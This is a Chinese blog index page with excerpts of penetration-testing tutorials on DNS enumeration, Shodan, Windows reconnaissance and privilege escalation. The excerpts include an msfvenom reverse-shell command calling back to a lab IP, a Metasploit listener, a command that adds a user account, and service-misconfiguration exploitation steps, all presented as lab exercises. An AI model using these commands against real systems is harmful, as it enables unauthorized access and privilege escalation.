最新发布第13页
排序
DNS枚举
1.DNS Enumeration意义Enumeration(枚举),就是不断猜测、尝试的过程,类似于暴力破解一个完整的DNS名称,又称为FQDN名称,是由主机名.域名后缀组成,典型的例子如www.qq.com1)DNS枚举可以让...
信息收集重要工具
1. Shodan网络空间搜索引擎语法举例:ftp country:'CN' port:2375 product:'Docker' country:'CN' port:22 os:'Debian' country:'CN' port:22 os:'Debian' country:'CN' city:'Beijing' http...
Windows本机信息收集
1. Windows系统基本命令1.1 系统信息收集显示系统的详细信息systeminfo1.2 用户信息whoami /user查看管理员组net localgroup administrators1.3 添加用户net user kali 123456 /add1.4 查看所有...
Windows漏洞利用权限提升
1.内核漏洞利用的流程获取OS的版本信息查找匹配的漏洞把漏洞利用程序(POC)传输到一个可写的目录运行,得到管理员shell 2. 实验2.1 获取OS的版本信息 2.2 查找匹配的漏洞https://github.com/bi...
实验
1. 获取一个Meterpreter shellmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.192.128 LPORT=3333 -f exe -o reverse.exe 2. 在Kali使用handler模块建立监听use exploit/multi/hand...
Running as in Windows
如果您以低权限用户的身份运行,并且拥有管理员凭证(用户名和密码),那么您可以使用这些凭证升级您的权限。最实际的方法是首先复制反向shell(例如,netcat或使用MSFvenom生成的shell)。之后...
PSExec
https://learn.microsoft.com/zh-cn/sysinternals/downloads/psexecPSExec 命令行工具类似于 runas,这个工具与 runas.exe 之间的区别在于PSExec有更多的选项和灵活性被称为命令行下的远程桌面...
Windows服务管理 sc
Windows系统中的服务就像Linux系统中的守护进程。它们在后台运行任务,大多数情况下,它们使用SYSTEM特权执行(为我们提供了另一种实现系统shell的方法)。 1.对服务的管理scsc qc [service na...
Windows服务漏洞利用-利用错误的服务权限进行提权
我们想要一个我们(有限的用户)的权限更改其配置的服务。如果这个服务是使用高权限账户运行时 我们可以修改此服务的执行路径改成我们反向shell的路径 shell返回高权限用户的shell从而提权。 我...
Windows服务漏洞利用-覆盖服务的可执行程序
在“Windows服务漏洞利用-利用错误的服务权限进行提权”一章中在我们拥有更改服务配置的权限假设我们没有这些权限(SERVICE_CHANGE_CONFIG)但是我们拥有更改服务可执行文件的权限。换句话说我...